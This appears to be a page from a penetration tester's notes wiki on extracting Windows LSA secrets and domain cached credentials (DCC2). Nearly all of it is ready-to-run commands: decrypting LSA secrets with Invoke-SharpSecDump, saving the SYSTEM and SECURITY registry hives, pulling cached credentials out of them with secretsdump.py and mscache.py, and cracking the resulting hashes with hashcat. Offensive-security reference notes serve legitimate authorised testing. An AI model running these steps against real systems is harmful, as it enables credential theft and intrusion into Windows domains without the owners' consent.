LSA - Pentester's Promiscuous Notebook

Search…

LSA

Local Security Authority

​https://www.passcape.com/index.php?section=docsys&cmd=details&id=23​
​https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets​
SharpSecDump
​https://github.com/G0ldenGunSec/SharpSecDump​
​https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-SharpSecDump.ps1​
Decrypt LSA secrets on target:
PS > Invoke-SharpSecDump -C "-target=127.0.0.1"
MSCash2/MSCache2 (DCC2)
​https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials​
Domain cached credentials are stored within LSA secrets in HKLM:\SECURITY registry hive:
Cmd > reg save hklm\system system.hive
Cmd > reg save hklm\security security.hive
secretsdump.py
Export registry hives and extract cached creds locally with secretsdump.py:
$ secretsdump.py -system system.hive -security security.hive LOCAL
mscache.py
​https://github.com/QAX-A-Team/mscache/blob/master/mscache.py​
Export registry hives and extract cached creds locally with mscache.py:
$ python mscache.py --system system.hive --security security.hive
Crack
$ hashcat -m 2100 -O -a 0 -w 4 --session=dcc2 -o dcc2.out dcc2.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule

Linux

NPLogonNotify

Last modified 11mo ago

Copy link

On this page

SharpSecDump

MSCash2/MSCache2 (DCC2)

secretsdump.py

mscache.py

Crack